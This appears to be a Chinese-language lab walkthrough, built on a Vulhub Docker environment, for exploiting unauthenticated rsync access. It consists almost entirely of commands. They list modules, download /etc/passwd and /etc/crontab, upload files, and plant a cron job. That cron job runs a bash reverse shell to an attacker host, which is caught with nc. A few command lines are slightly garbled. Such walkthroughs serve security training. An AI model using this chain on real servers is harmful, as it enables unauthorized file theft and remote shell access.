cd vulhub-master/rsync/common
docker -composeup -d
检测
1.列出目标服务器的同步目录
rsync 192.168.244.129::
2.查看模块文件
rsync rsync://192.168.244.129/src
3.下载文件
rsync -av 192.168.244.129::src/etc/passwd ./
//rsync -av ip::src/路径
4.文件上传
rsync -av ceshi.sh rsync://192.168.244.129/src/tmp/ceshi.sh
5.nmap探测
nmap -p 873 --script rsync-list-modules 192.168.244.129
6.反弹shell
下载定时任务
rsync rsync://192.168.244.129:873/src/etc/crontab ./
表示每小时的第17分钟执行run-parts --report /etc/cron.hourly
进行编辑crontab文件并保存退出(每隔1分钟运行一次脚本)
*/1 * * * * root /tmp/ceshi.sh
编写ceshi.sh文件
chmod 777
#!/bin/bash
/bin/bash -i >& /dev/tcp/192.168.244.128/441 0>&1
上传ceshi.sh文件
rsync -av crontab 192.168.244.129::src/tmp/ceshi.sh
rsync -av ceshi.sh 192.168.244.129::src/etc/cron.hourly 每小时17分反弹的
上传crontab文件
rsync -av crontab 192.168.244.129::src/etc/crontab
开启监听
nc -lvvp 441
获取shell